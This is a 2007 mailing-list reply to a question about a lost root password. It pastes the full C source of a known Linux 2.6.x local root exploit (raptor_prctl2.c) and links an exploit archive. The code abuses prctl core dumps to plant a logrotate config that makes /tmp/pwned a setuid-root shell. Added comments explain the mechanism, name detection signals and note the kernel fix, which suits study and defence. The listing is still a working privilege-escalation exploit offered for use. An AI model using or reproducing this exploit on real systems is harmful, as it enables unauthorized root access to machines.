[sf-lug] recovery from loss of root password

Kristian Erik Hermansen kristian.hermansen at gmail.com
Wed Sep 26 08:34:43 PDT 2007


http://milw0rm.com/search.php?dong=ubuntu

 - OR -

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <sys/prctl.h>

#define INFO1	"raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define	INFO2	"Copyright (c) 2006 Marco Ivaldi <raptor at 0xdeadbeef.info>"

/*
 * Data carried by the exploit process image.
 *
 * `payload` is never referenced by main(); presumably it exists only so
 * the text is present in the forked children's memory and therefore ends
 * up inside the core file the kernel writes (see main()).  As pasted here
 * the string literals are wrapped across physical lines by the mail
 * client, so this listing is not byte-exact C.
 *
 * Defender's reading: the logrotate stanza names the artifacts this
 * technique leaves behind - a file called "core" in /var/log and in
 * /etc/logrotate.d, and a setuid-root binary at /tmp/pwned.  Alerting on
 * new files in /etc/logrotate.d and on setuid bits appearing under /tmp
 * (or mounting /tmp nosuid) catches the observable part of this chain.
 */
char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n    daily\n    size=0\n    firstaction\n
chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f
/etc/logrotate.d/core; rm -f /var/log/core*\n    endscript\n}\n";

/*
 * Shell command string handed to system() by main().  It writes a tiny C
 * program to /tmp/pwned.c, compiles it with gcc, and deletes the source;
 * the resulting /tmp/pwned only does something useful once the logrotate
 * stanza above has chown'ed it to root and set mode 4755.  A compiler
 * invocation from an interactive user's shell on a server is itself a
 * reasonable detection signal.
 */
char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >
/tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f
/tmp/pwned.c";

/*
 * Proof-of-concept (2006, Marco Ivaldi) for a Linux 2.6.x kernel bug in
 * the handling of prctl(PR_SET_DUMPABLE, 2).  Mechanism visible below:
 * two children chdir() into directories an unprivileged user cannot
 * write to, set dumpable mode 2, and are killed with SIGSEGV; on an
 * affected kernel the core file lands in that cwd as "core", carrying
 * the `payload` string in its data segment.  The stat() calls at the end
 * only confirm the files exist.
 *
 * NOTE(review): the kernel behaviour this depends on was fixed upstream
 * long ago - on a patched kernel an unprivileged process cannot select
 * dumpable mode 2 via prctl (it is governed by the fs.suid_dumpable
 * sysctl instead), so the stat() check fails and the program exits 1.
 * Setting kernel.core_pattern to an absolute path or a pipe handler also
 * removes the "core in the current directory" behaviour that the
 * technique relies on.
 *
 * None of the system calls here (setrlimit, chdir, prctl, kill) have
 * their return values checked; the author's "See comments" message is
 * the only failure diagnostic.
 *
 * Returns 0 if both core files were observed, 1 otherwise.
 */
int main(void)
{
	int 		pid;
	struct rlimit 	corelimit;
	struct stat	st;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* prepare the setuid() helper */
	/* runs the `pwnage` shell string: gcc is invoked from the user's shell */
	system(pwnage);

	/* set core size to unlimited */
	/* soft and hard RLIMIT_CORE both raised so the kernel will write a dump;
	 * a hard limit of 0 set by the administrator would make this fail, but
	 * the return value is not inspected */
	corelimit.rlim_cur = RLIM_INFINITY;
	corelimit.rlim_max = RLIM_INFINITY;
	setrlimit(RLIMIT_CORE, &corelimit);

	/* let's create a fake logfile in /var/log */
	/* child: cwd becomes /var/log, dumpable mode 2 requested, then it just
	 * sleeps until the parent signals it; the dump (if any) is named "core" */
	if (!(pid = fork())) {
		chdir("/var/log");
		prctl(PR_SET_DUMPABLE, 2);
		sleep(666);
		exit(1);
	}
	kill(pid, SIGSEGV);

	/* let's do the PR_SET_DUMPABLE magic */
	/* second child does the same with cwd = /etc/logrotate.d, the directory
	 * logrotate reads its per-service config from */
	if (!(pid = fork())) {
		chdir("/etc/logrotate.d");
		prctl(PR_SET_DUMPABLE, 2);
		sleep(666);
		exit(1);
	}
	kill(pid, SIGSEGV);

	/* did it work? */
	/* both files must exist; on a patched kernel this is where it stops */
	sleep(3);
	if ((stat("/var/log/core", &st) < 0) ||
	    (stat("/etc/logrotate.d/core", &st) < 0)) {
		fprintf(stderr, "Error: Not vulnerable? See comments.\n");
		exit(1);
	}

	/* total pwnage */
	/* nothing further happens in this process; the remaining step is taken
	 * by root's scheduled logrotate run, which is why the artifacts above
	 * persist on disk until then */
	fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
	exit(0);
}
-- 
Kristian Erik Hermansen



